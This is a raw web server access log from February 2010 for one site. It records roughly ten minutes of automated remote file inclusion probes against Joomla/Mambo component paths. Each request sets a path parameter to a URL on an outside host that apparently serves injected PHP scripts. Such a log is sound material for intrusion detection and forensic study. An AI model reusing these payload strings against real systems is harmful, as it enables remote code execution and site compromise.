61.63.82.14 - - [13/Feb/2010:08:40:41 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:40:43 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:41:05 -0800] "GET /logs/access_100116.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:41:07 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:41:41 -0800] "GET /logs/access_100109.log%20/index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:42:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:42:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:42:33 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:42:34 -0800] "GET /logs/access_100208.log%20%20/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:42:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:42:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:42:36 -0800] "GET /logs/access_100123.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:42:41 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:42:46 -0800] "GET /logs/access_100122.log%20%20/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:42:51 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:42:51 -0800] "GET /home.php?index=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:42:51 -0800] "GET /logs/home.php?index=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:43:38 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:44:04 -0800] "GET /logs/access_100109.log%20/index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:44:08 -0800] "GET /logs/access_100112.log//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:44:08 -0800] "GET /logs//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:44:08 -0800] "GET /administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:09 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:11 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:44:13 -0800] "GET /logs//index.php?AML_opensite=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:44:13 -0800] "GET /logs/access_100202.log%20%20//index.php?AML_opensite=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:44:13 -0800] "GET /index.php?AML_opensite=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:14 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:44:14 -0800] "GET /logs/access_100109.log%20%20//index.php?AML_opensite=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:17 -0800] "GET /logs/access_100118.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:17 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:17 -0800] "GET /logs/access_100123.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:19 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:19 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:19 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:44:26 -0800] "GET /logs/access_100112.log/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:44:27 -0800] "GET /logs/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:44:27 -0800] "GET /?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:29 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:29 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:29 -0800] "GET /logs/access_100123.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:44:32 -0800] "GET /logs/access_100118.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:44:35 -0800] "GET /logs/access_100112.log%20%20/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:44:35 -0800] "GET /?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:44:35 -0800] "GET /logs/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:45:05 -0800] "GET /logs/access_100118.log/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:45:10 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:45:14 -0800] "GET /logs/access_100118.log%20%20/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:45:17 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:45:29 -0800] "GET /logs/access_100112.log/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:45:29 -0800] "GET /logs/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:45:29 -0800] "GET /?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:45:42 -0800] "GET /logs/access_100112.log/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:45:42 -0800] "GET /logs/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:45:42 -0800] "GET /?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:45:52 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:45:56 -0800] "GET /logs/access_100112.log%20%20/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:45:56 -0800] "GET /?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:45:56 -0800] "GET /logs/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:46:01 -0800] "GET /logs/access_100118.log/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:46:55 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:46:58 -0800] "GET /logs/access_100118.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:47:00 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:47:00 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:47:00 -0800] "GET /logs/access_100123.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:47:14 -0800] "GET /logs/access_100126.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:47:14 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:47:14 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:47:17 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:47:29 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:47:52 -0800] "GET /logs/access_100126.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:47:52 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:47:52 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:48:07 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:48:08 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:48:43 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:48:43 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:48:44 -0800] "GET /logs/access_100118.log%20%20/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:48:44 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:48:49 -0800] "GET /logs/access_100118.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:48:51 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:48:56 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:48:59 -0800] "GET /logs/access_100118.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:49:39 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:49:39 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:49:39 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:49:42 -0800] "GET /logs/access_100112.log%20%20//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:50:02 -0800] "GET /logs/access_100201.log%20%20//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:50:11 -0800] "GET /logs/access_100202.log//index.php?AML_opensite=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:50:11 -0800] "GET /logs/access_100109.log//index.php?AML_opensite=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:50:18 -0800] "GET /logs/?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:50:18 -0800] "GET /logs/access_100112.log/?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:50:19 -0800] "GET /?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:50:20 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:50:47 -0800] "GET /logs/access_100118.log/?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:50:53 -0800] "GET /logs/access_100118.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:51:28 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:51:38 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:51:38 -0800] "GET /logs/access_100126.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:51:38 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
